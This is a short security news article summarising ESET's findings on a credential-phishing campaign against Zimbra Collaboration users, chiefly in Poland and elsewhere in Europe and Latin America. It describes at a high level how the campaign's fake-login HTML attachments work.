ESET researchers have recently identified a broad phishing campaign with the objective of gathering credentials from Zimbra account users.

Zimbra Collaboration stands as an open-core cooperative software platform, establishing itself as a sought-after alternative to many mainstream enterprise email platforms.

Details on the Zimbra Phishing Efforts

This campaign has shown activity since April 2023 and shows no signs of abating. Its primary targets include a diverse range of small to medium-sized enterprises, as well as governmental institutions.

Data from ESET’s telemetry indicates that Poland hosts the majority of these targets. Nevertheless, users in other European nations, including Ukraine, Italy, France, and the Netherlands, have been affected as well. Similarly, several countries in Latin America have reported cases, with Ecuador leading in the number of detections.

Though this campaign may not exhibit high technical intricacy, it has effectively breached organizations using Zimbra Collaboration.

Adversaries benefit from the fact that HTML attachments often contain genuine code. The only distinguishing malicious element is typically a link redirecting to a malicious host. This method proves more elusive to reputation-based antispam measures compared to common phishing techniques, where malicious links are embedded directly within the email text. ESET’s Viktor Šperka, the researcher behind the campaign’s discovery, offered these insights.

Šperka also noted the diverse range of targeted organizations, highlighting that the sole commonality among victims is their use of Zimbra. Given that Zimbra Collaboration tends to be popular with organizations operating on tighter IT budgets, it remains a lucrative target for attackers.

Chronology of the Attack

Initially, a target will receive an email containing an attached phishing page. This email typically alerts the recipient about updates related to the email server, possible account deactivation, or similar concerns, urging the user to open the attachment.

Upon accessing the attachment, users encounter a counterfeit Zimbra login screen tailored to mirror the branding of the targeted organization. Simultaneously, any inputted credentials are captured from the HTML form and transmitted to an attacker-controlled server. This, in turn, grants the attacker potential access to the compromised email account.

There’s a substantial possibility that attackers successfully breached some administrator accounts, subsequently establishing new mailboxes. These new mailboxes might then be utilized to dispatch phishing emails to additional potential victims. While ESET’s observations indicate the campaign primarily leans on social engineering and user interaction, future strategies might diverge.